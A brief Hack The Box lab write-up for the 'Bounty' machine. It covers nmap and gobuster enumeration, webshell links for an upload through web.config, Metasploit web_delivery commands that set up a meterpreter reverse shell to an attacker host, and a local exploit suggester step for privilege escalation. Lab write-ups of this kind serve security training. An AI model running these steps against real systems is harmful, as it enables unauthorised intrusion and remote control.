Hack The Box: Bounty




Difficulty: Eazy Machine Creator: mrb3n Tools Used:

NMAP Gobuster Metasploit

Task: To find User.txt and Root.txt

Network Enumeration

Let’s start with a simple NMAP scan to discover open ports and services.

nmap -A 10.10.10.93


GoBuster

Using Gobuster, we can perform a directory scan. This host is a windows IIS server so we can add the extensions of .aspx,.html.

gobuster -u http://10.10.10.93 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 40 -x .aspx,.html



Remote Code Execution (RCE)




Webshell

Since we can upload a web.config file, we should be able to upload a web shell in the config file.

https://raw.githubusercontent.com/tennc/webshell/master/asp/webshell.asphttps://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.asp


Web Delivery Meterperter Shell

We need to build our exploit from Metasploit using the web delivery script.

msf use exploit/multi/script/web_deliverymsf exploit(multi/script/web_delivery) set srvhost 10.10.14.2msf exploit(multi/script/web_delivery) set target 2msf exploit(multi/script/web_delivery) set payload window/x64/meterpreter/reverse_tcpmsf exploit(multi/script/web_delivery) set lhost 10.10.14.2msf exploit(multi/script/web_delivery) run

Meterperter Shell


User.txt


Privilege Escalation

Now we need to get system level session to get the root.txt we can use the recon local_exploit_suggester module in Metasploit.

msf use post/multi/recon/local_exploit_suggester msf set session 2 msf run

Privilege Escalation Exploit



Root.txt